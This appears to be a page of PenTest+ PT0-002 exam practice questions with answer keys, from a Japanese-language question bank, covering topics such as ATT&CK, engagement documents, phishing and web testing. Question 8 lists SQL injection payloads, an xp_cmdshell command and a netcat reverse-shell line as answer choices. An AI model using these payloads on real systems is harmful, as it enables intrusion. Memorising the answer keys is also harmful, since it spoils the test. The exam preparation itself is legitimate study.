Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?
A. MITRE ATT&CK
B. Well-Architected Framework
C. Cyber Kill Chain
D. OWASP Top 10
正解:A
質問 2:
A penetration tester would like to know if any web servers or mail servers are running on the in-scope network segment. Which of the following is the best to use in this scenario?
A. ARP scans
B. Website crawling
C. DNS lookups
D. Nmap probes
正解:D
質問 3:
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)
A. BeEF
B. Burp Suite
C. Nmap
D. Nessus
E. Hydra
F. OWASP ZAP
正解:B,F
質問 4:
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
A. SLA
B. NDA
C. ROE
D. MSA
正解:B
質問 5:
Which of the following documents best ensures an external consulting firm that is hired to perform a penetration test understands and complies with the customer's security policies and procedures?
A. MOU
B. SLA
C. NDA
D. ROE
正解:D
解説: (Pass4Test メンバーにのみ表示されます)
質問 6:
Which of the following describes how a penetration tester could prioritize findings in a report?
A. Business mission and goals
B. Network infrastructure
C. Cyberassets
D. Cyberthreats
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 7:
During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?
A. Spear phishing
B. Badge cloning
C. Watering-hole attack
D. Impersonation
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 8:
A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:
http://company.com/catalog.asp?productid=22
The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:
http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'
Which of the following should the penetration tester attempt NEXT?
A. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
B. http://company.com/catalog.asp?productid=22' OR 1=1 --
C. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
D. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
正解:D
解説: (Pass4Test メンバーにのみ表示されます)
質問 9:
During a penetration testing engagement, a penetration tester discovers a buffer overflow vulnerability. Which of the following actions should the tester take to maintain professionalism and integrity?
A. Report the vulnerability to the client and provide recommendations for remediation.
B. Exploit the vulnerability to demonstrate its impact to the client.
C. Apply for a bug bounty reward from the manufacturer.
D. Inform the appropriate authorities about the vulnerability before informing the client.
正解:A
Tajima -
読みやすく わかりやすい解説が大のお気に入りですし、このPT0-002問題集一つに集約していて素晴らしいですね。ありがとうございます。